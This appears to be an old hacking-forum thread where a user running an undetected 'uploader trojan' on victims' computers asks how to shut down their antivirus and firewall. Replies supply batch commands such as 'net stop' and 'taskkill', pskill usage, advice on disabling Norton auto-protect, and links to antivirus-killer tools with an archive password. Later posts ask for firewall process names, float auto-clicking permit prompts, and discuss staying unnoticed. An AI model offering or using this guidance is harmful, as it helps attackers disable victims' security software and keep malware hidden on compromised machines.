Ok so I got this trojan, made it undetected.. even after execution it isnt detected like others.. but its a uploader trojan. So I cant do anything to the vic; if I upload a trojan it will be detected and so will any of the various AV killers that are public...
Is there anyway to kill a selected process,such as a .bat script or something similir.Something I can just edit with selected process, upload and run.. Please post your ideas: the .bat script could be used but what are the commands??

Net Stop <process>

or you could do taskkill /IM runningfile.exe

I wrote a AVKiller in VB, kills a number or AV's and FW's get in on my site:

www.D3ADLiN3.8k.com

So "netstop <ccapp>" without quotes would be a example in a .bat file... The trojan has a plugin to view processes however it doesnt allow you to kill them so THANKS!

no eyeless
it will be not in quotes as you know
"net stop process_here"
remember the spaces between net and stop

d3adlin3, my AV detects ur program.

yeah I had included it in a few programs I wrote, if you have MS Visual Basic you can download the source of my site and recompile it.

I may try updating it, possibly adding multiple threads to kill stuff quicker

nice killer D3ADLiN3 gonna try it soon =)

why not try and make your trojan undetected? it's a bit gay to go killing AV services, the vic will notice.

try changing it up and making it undetectable

Thanks, guys exactly what I needed. I wish I could, well actully I can ive even made Assasin (from evil eye) undetecctable. Well almost, its not hard to make it undetected but after it is ran it drops damn .dll files and its picked up.

first "net start" : then
net stop <process_to_kill>

or try
first : look open ports and then :
pskill.exe <process_to_kill>

with norton you cant normaly kill the prog its self, but you can take out
the auto protect... correct me if im worng

You can use abacab,
He can kill more than 400 AV/FW and others Nt services.
And many others functions.

http://0data.site.voila.fr/clientabacab.htm

Password archive: abac

I was looking of for a bat file.

Thanks exist.

Yeah Silent Bob, I always found nortons and the best way is to switch off the auto protect in TS or another remote admin
I dont know about AV/FW killer programs

ihae ifected by saser iclean the drive but it still there

Those little programs that kill a 1000 different applications are a bad idea. You'll BSOD alot of boxes that way and even if you don't their cpu hogs, querying that long list every 30sec's or whatever value. It's also a great way to be discovered. What do you think happens after a guy can't update his avp and the icon that's been in his systray for a year isn't there anymore ?

this is true, mainly why i was looking for a bat file, one swoop and its done, reboot the box and its back on

well my trojan is undetected so im not worried about killing the av its the firewall. Some ppl may block the connection back or incomming so there lies my problem. i can kill the firewalsl but im finding it really hard to find a list of the main firewall process names. can some ppl name the ones there useing that would help. but it wood be good to create a file that auto click or auto permits the file accessing the internet. Im thinking if the pop up that says permit deny ect. pop ups up in the sme place everytime is it possable to set the mouse to jump to that spot and click. i know that you can set it to jump to somethings when a msg liek that comes up. just something to keep me amussed.

toe

http://illmob.org/files/illmob/kILLer3.0.zip

yea its a bit outdated but still works

Wow, and here's me thinking trojans died a long time ago. Good they haven't. Think i'll write one. Anyway, hi to illwill, long time no speak mate.